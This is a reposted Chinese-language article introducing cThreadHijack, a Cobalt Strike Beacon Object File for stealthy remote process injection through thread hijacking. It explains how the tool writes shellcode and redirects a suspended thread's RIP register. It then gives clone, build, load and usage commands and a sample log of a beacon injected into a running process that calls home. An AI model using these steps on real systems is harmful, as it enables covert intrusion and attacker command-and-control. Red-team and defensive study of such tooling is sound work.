加入收藏 | 设为首页 | 会员中心 | 我要投稿 莆田站长网 (https://www.0594zz.com.cn/)- 业务安全、应用安全、终端安全、数据分析、数据应用!
当前位置: 首页 > 服务器 > 安全 > 正文

怎么使用cThreadHijack实现远程进程注入研究

发布时间:2021-10-01 14:04:40 所属栏目:安全 来源:互联网
导读:关于cThreadHijack cThreadHijack是一个针对远程进程注入信标对象文件(BOF),该工具主要通过线程劫持技术实现其功能,并且不会生成任何远程线程。 运行机制 cThreadHijack可以根据用户提供的监听器参数来生成原始信标Shellcode,并根据用户提供的PID参数将其
关于cThreadHijack
cThreadHijack是一个针对远程进程注入信标对象文件(BOF),该工具主要通过线程劫持技术实现其功能,并且不会生成任何远程线程。
 
运行机制
cThreadHijack可以根据用户提供的监听器参数来生成原始信标Shellcode,并根据用户提供的PID参数将其注入至远程进程中,这一步主要利用的是VirtualAllocEx和WriteProcessMemory方法。
 
接下来,cThreadHijack并不会通过CreateRemoteThread或其他API生成一个新的远程线程,而是识别目标进程中的第一个线程,挂起目标线程之后,它便会通过一个CONTEXT结构体来获取线程CPU状态的内容。接下来,它会修改CONTEXT结构体中RIP寄存器成员的地址,并将其指向远程Payload。
 
在执行之前,cThreadHijack会将一个封装了信标Shellcode的程序添加至一个针对CreateThread的调用方法中。CreateThread程序封装在一个名叫NtContinue的函数调用程序,可以允许之前被劫持的线程在不导致远程进程崩溃的前提下恢复运行。cThreadHijack的信标Payload在生成时会带有一个“线程退出函数”,以允许进程在信标退出之后继续执行。
 
信标监听器的名称如果包含空格的话,必须放在引号中。
 
工具下载
广大研究人员可以使用下列命令将该项目源码克隆至本地:
 
git clone https://github.com/connormcgarr/cThreadHijack.git 
项目构建
首先,在一台Windows虚拟机上,点击Win键,输入“x64 Native Tools”打开“x64 Native Tools Command Prompt for VS”对话框。
 
接下来,将目录修改为“C:pathtocThreadHijack”。
 
然后运行下列命令:
 
nmake -f Makefile.msvc build 
最后,通过Cobalt Strike的“Script Console”以及参数“load /path/to/cThreadHijack.cna”来加载cThreadHijack.cna。
 
工具使用
cThreadHijack PID LISTENER_NAME 
运行结果样例如下:
 
beacon> cThreadHijack 7340 TESTING 
 
[+] host called home, sent: 268433 bytes 
 
[+] received output: 
 
[+] Target process PID: 7340 
 
  
 
[+] received output: 
 
[+] Opened a handle to PID 7340 
 
  
 
[+] received output: 
 
[+] Found a thread in the target process! Thread ID: 10212 
 
  
 
[+] received output: 
 
[+] Suspending the targeted thread... 
 
  
 
[+] received output: 
 
[+] Wrote Beacon shellcode to the remote process! 
 
  
 
[+] received output: 
 
[+] Virtual memory for CreateThread and NtContinue routines allocated at 0x201f4ab0000 inside of the remote process! 
 
  
 
[+] received output: 
 
[+] Size of NtContinue routine: 64 bytes 
 
[+] Size of CONTEXT structure: 1232 bytes 
 
[+] Size of stack alignment routine: 4 
 
[+] Size of CreateThread routine: 64 
 
[+] Size of shellcode: 261632 bytes 
 
  
 
[+] received output: 
 
[+] Wrote payload to buffer to previously allocated buffer inside of! 
 
  
 
[+] received output: 
 
[+] Current RIP: 0x7ffa55df69a4 
 
  
 
[+] received output: 
 
[+] Successfully pointed the target thread's RIP register to the shellcode! 
 
  
 
[+] received output: 
 
[+] Current RIP: 0x201f4ab0000 
 
  
 
[+] received output: 
 
[+] Resuming the thread! Please wait a few moments for the Beacon payload to execute... 

(编辑:莆田站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
    相关内容
      推荐文章
      站长推荐
      热点阅读

        【免责声明】本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关链接至邮箱bqsm@foxmail.com我们将及时予以处理。

        建议您使用1920×1080分辨率、谷歌浏览器Google Chrome、Microsoft Edge以获得本站的非凡浏览效果

        Copygight © 2017-2023 https://www.0594zz.com.cn/ All Rights Reserved. 莆田站长网